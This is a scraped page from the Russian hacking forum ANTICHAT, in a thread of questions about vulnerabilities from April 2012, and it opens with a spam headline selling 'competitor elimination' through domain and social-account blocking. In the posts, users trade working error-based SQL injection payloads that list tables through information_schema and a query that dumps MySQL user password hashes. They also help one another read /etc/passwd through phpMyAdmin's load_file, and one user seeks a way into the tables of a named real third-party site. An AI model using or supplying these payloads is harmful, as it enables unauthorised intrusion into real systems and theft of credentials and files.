УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2047 из 2438

2047

Опции темы

Поиск в этой теме

Опции просмотра

#20461

21.04.2012, 12:45

Ereee

Guest

Сообщений: n/a

Провел на форуме:
102354

Репутация: 267

Цитата:

Сообщение от \/ITA

\/ITA said:
спасибо за подсказку
нашел скулю в POST на одном сайте подставил
site.ru?id=1"
выдает мне такое:

Код:

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?id=1""' at line 3 SQL query : 
            INSERT INTO
                ips(ip, cnt, last_url)
           VALUES("***.93.28.***", 1,"/?id=1"")
                ON DUPLICATE KEY UPDATE cnt=cnt+1, last_url="/?id=1""

я еще не пробовал инжектить в Insert или Update
где можно почитать посмотреть как это делается?

,(select+1+from(select+count(*),concat((select+tab le_name+from+information_schema.tables+limit+0,1), floor(rand(0)*2))x+from+information_schema.tables+ group+by+x)a)

#20462

21.04.2012, 12:53

asiaman

Guest

Сообщений: n/a

Провел на форуме:
10268

Репутация: 0

Цитата:

Сообщение от Tigger

Tigger said:
asiaman
Ну или:
https://rdot.org/forum/showpost.php?p=20287&postcount=12

Код:

Code:
1'and(1)=(select*from(select*from(information_schema.tables`a`)JOIN(information_schema.tables`b`)using(TABLE_CATALOG,TABLE_SCHEMA))c)='1

1060: Duplicate column name 'Table_Name'

Здесь понятно. Спасибо. Мы просто делаем листинг таблиц и столбцов.

Собственно вопрос. Нашли таблицу, вывели все имена столбцов. Можно ли использовать этот шаблон с join + using/on для вывода через ошибку дубля (как выше) записей из таблиц?

При условии, что пробелы запрещены, limit, order, соответственно, запрещены. А name_const будет работать только на вывод version（） (из-за баги - другое не выводит). ExtractValue - в этой ветке 5.0.x отсутствует.

Или какие еще есть варианты по выводу в таком случае?

Здесь http://www.xakep.ru/post/50554/?print=true и здесь /threadnav119047-1-10.html ответов, к сожалению, не нашел

__________________________________________________ ____

Еще вопрос. Вот http://www.efanli.com.cn/article_list.php?cid=1 блинд, как я понимаю, там запрет на обращение к схеме. Через блинд можно вывести пути, юзера, базу и др. НО, как подобраться к таблицам и соответственно, к записям таблиц?

#20463

21.04.2012, 13:18

Darkee

Guest

Сообщений: n/a

Провел на форуме:
262

Репутация: 0

Нужна помощь,как можно найти уязвимость в таком типе http://reg.piratua.ru/ ?

#20464

21.04.2012, 16:29

qaz

Guest

Сообщений: n/a

Провел на форуме:
344922

Репутация: 75

такой вопрос, получил доступ в phpmyadmin

хотел скачать

etc/passwd

ввожу запрос

SELECT load_file( '/etc/passwd' )

нормально выдало

load_file('/etc/passwd')

[BLOB - 1.2 КБ]

но содержимое показывать нехочет, чтобы в параметрах невыставил нифига не катит,

ни Показать BLOB содержимое ни Развернутое отображение данных, в первы раз такое, как всётаки можно попробовать посмотреть содержимаее файла etc/passwd в таком случае?

#20465

21.04.2012, 16:39

Ereee

Guest

Сообщений: n/a

Провел на форуме:
102354

Репутация: 267

Цитата:

Сообщение от qaz

qaz said:
такой вопрос, получил доступ в phpmyadmin
хотел скачать
etc/passwd
ввожу запрос
SELECT load_file( '/etc/passwd' )
нормально выдало
load_file('/etc/passwd')
[BLOB - 1.2 КБ]
но содержимое показывать нехочет, чтобы в параметрах невыставил нифига не катит,
ни Показать BLOB содержимое ни Развернутое отображение данных, в первы раз такое, как всётаки можно попробовать посмотреть содержимаее файла etc/passwd в таком случае?

Показ в HEX отключи или в таблицу заноси.

#20466

21.04.2012, 16:39

Seravin

Участник форума

Регистрация: 25.11.2009

Сообщений: 201

Провел на форуме:
866555

Репутация: 226

Когда делаешь запрос над результатами будет Options. Клацаешь и галочку на show blob content

#20467

21.04.2012, 16:54

Ereee

Guest

Сообщений: n/a

Провел на форуме:
102354

Репутация: 267

Цитата:

Сообщение от Seravin

Seravin said:
Когда делаешь запрос над результатами будет Options. Клацаешь и галочку на show blob content

чтобы в параметрах невыставил нифига не катит,

ни Показать BLOB содержимое ни Развернутое отображение данных

#20468

21.04.2012, 17:35

qaz

Guest

Сообщений: n/a

Провел на форуме:
344922

Репутация: 75

Цитата:

Сообщение от Ereee

Ereee said:
Показ в HEX отключи или в таблицу заноси.

не, никакие насройки в параметрах некатят, а как мне занесли данные в таблицу?

попробовал так

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]insert into[/COLOR][COLOR="#007700"]`[/COLOR][COLOR="#DD0000"]db.a[/COLOR][COLOR="#007700"]` (`[/COLOR][COLOR="#DD0000"]text[/COLOR][COLOR="#007700"]`)[/COLOR][COLOR="#0000BB"]VALUES[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'(select load_file('[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]passwd[/COLOR][COLOR="#DD0000"]'))'[/COLOR][COLOR="#007700"])

[/COLOR][/COLOR]

выдпло ошибку, как правельние?

#20469

21.04.2012, 17:44

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от qaz

qaz said:
не, никакие насройки в параметрах некатят, а как мне занесли данные в таблицу?
попробовал так

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]insert into[/COLOR][COLOR="#007700"]`[/COLOR][COLOR="#DD0000"]db.a[/COLOR][COLOR="#007700"]` (`[/COLOR][COLOR="#DD0000"]text[/COLOR][COLOR="#007700"]`)[/COLOR][COLOR="#0000BB"]VALUES[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'(select load_file('[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]passwd[/COLOR][COLOR="#DD0000"]')'[/COLOR][COLOR="#007700"])

[/COLOR][/COLOR]

выдпло ошибку, как правельние?

убери кавычки, у тебя стринг получается, а не выполняющаяся функция

((select load_file('/etc/passwd'))

#20470

21.04.2012, 20:39

Facecontrol

Guest

Сообщений: n/a

Провел на форуме:
13805

Репутация: 0

Цитата:

Сообщение от Ereee

Ereee said:
Значит не повезло.
Делай

Код:

Code:
select concat_ws(0x3a,Host,User,Password,File_priv) from mysql.user

Дальше ищи phpmyadmin.

нет походу просто я неправильно пользуюсь тем примером.Вот я а локалхосте пробую пользоваться,и ввожу как в том примере

http://localhost/erase.php?id=-2+union+select+0x2D3220756E696F6E2073656C656374202 7393939272C3131312F2A,2,3/* поидее как там пишется должно вывести 2:3

999:111 но выводит -2 union select '999',111/* вот такие дела

Страница 2047 из 2438

2047

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)

Быстрый переход